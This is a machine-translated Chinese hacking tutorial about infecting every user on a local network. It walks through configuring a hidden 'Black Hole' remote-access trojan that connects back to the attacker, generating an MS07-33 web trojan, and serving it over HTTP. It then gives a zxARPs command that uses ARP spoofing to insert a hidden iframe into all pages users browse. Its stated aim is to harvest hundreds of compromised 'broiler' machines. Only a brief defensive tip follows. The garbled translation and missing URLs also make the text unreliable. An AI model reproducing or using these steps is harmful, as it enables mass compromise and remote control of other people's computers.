New hung it to the way ARP spoofing hung it to the roost area network-vulnerability warning-the black bar safety net

ID MYHACK58:62200820795
Type myhack58
Reporter 佚名
Modified 2008-10-23T00:00:00


Web hang Horse the most difficult is to spread a small website, easy to invasion but the access number is not much, harvest the broiler also is not very much. Therefore, a new kind of hung it to the way the epidemic began--a local area network ARP spoofing hung it, as long as the local area network within a machine caught, it can including the network spread containing Trojan web page, the capture of the broilers will be a geometric growth.

The LAN ARP spoofing hung it to the benefits as follows: without the invasion site, as long as your host is in the LAN, which is its biggest advantage;the harvest of the broiler a lot, within a short time you can harvest dozens or even hundreds of broilers, similar to the cafe so that by hundreds of computers consisting of LANs is the best hang horse sites;the LAN users to access any web site will we the Trojans. Read the above description, you guys are not already around the corner?

First step: configure the Trojan end

We have“black hole”Trojan, for example. Run the“black hole”Trojan Client. exe file, into the Client. exe in the main interface, click“File→to create a DLL and insert the version of the service end of the program.”

Enter the service end of the program creation interface, first check the“Win NT/2 0 0 0/XP/2 0 0 3 under the hidden service side files, Registry, processes, and services”, and then switch to the“connection Options”tab in the“host”box fill in the machine's public IP address, the port can keep the default of“2 0 0 7”in. Finally, in the“connection password”at the fill used to connect the other of the password, e.g. 1 2 3 4 5 6 The. After the setup is complete click the“Generate”button 将 木马 服务 端 保存 为 muma.exe the.

Fill in the password

Second step: generate a web page Trojan

Since it is hung it, then of course missing not web Trojan. Here we use the“MS07-3 3 network horse generator”, for example. Run“MS07-3 3 network horse generator”, in the“mA address”text box, enter the Trojan horse the path where, due to the wait we have to self-erection of the Http service, so it should be filled in““, wherein the 1 9 2. 1 6 8. 0. 2 is the machine in the LAN IP address. Click the“Generate net horse”按钮 即可 生成 网 马 hackll.htm the.

Third step: turn on the machine Http service

To make a local area network of the other host be able to access to our network of mA, it is necessary to turn on the machine's Http service. Download baby web server, which is a simpleWeb serverthe Software, Download directly after the operation, in its main interface by clicking on the“service→settings.”

The“web directory”is set to the web Trojan the place where, for example, C disk root directory“C:\“is. Click“OK”back to main interface, and then point“Start”button to turn on the machine's Http service. Remember to will Trojan service client and the web Trojan horse into the C drive root directory.

Button to turn on the machine's Http service

Step four: LAN hung it to the

Finally, the please our main character played, is the above mentioned small tool, this tool called zxARPs, is a through ARP spoofing for LAN hung it to the tool. In the use of zxARPs before we want to install WinPcap, which is the underlying network drive package, without it zxARPs on the run.

After installation the zxARPs into any directory, then run“command prompt”, enter the zxARPs the same directory, and then enter the command: zxARPs.exe -idx 0-ip 8 0-insert" After installation the zxARPs into any directory, then run“command prompt”, enter the zxARPs the same directory, and then enter the command: zxARPs.exe -idx 0-ip 8 0-insert "<iframe src='' width=0 height=0>". A carriage return after the hanging horse.

From now on, a local area network of the user, whether access to the What site can run our web Trojan, because zxARPs the user opens the page at the same time have the hang horse code inserted into a normal web page ARP hung it prevention tips

Seen from the above zxARPs function really very powerful, but it is after all based on the ARP spoofing principle, as long as the LAN host to be able to defend against ARP spoofing attacks, you can completely ignore zxARPs of Hang horse method.

The network will be within the LAN all of the host IP address and MAC address binding you can get. We can also download the“360ARP firewall”to protect against ARP spoofing attacks(download address: http://www2. cpcw. com/bzsoft), the installation is complete click on the interface to the“Open”button, you can let it protect us from ARP spoofing attack. Then if someone on your host ARP spoofing attack, we can click on the“record”button to view the attacker's IP address.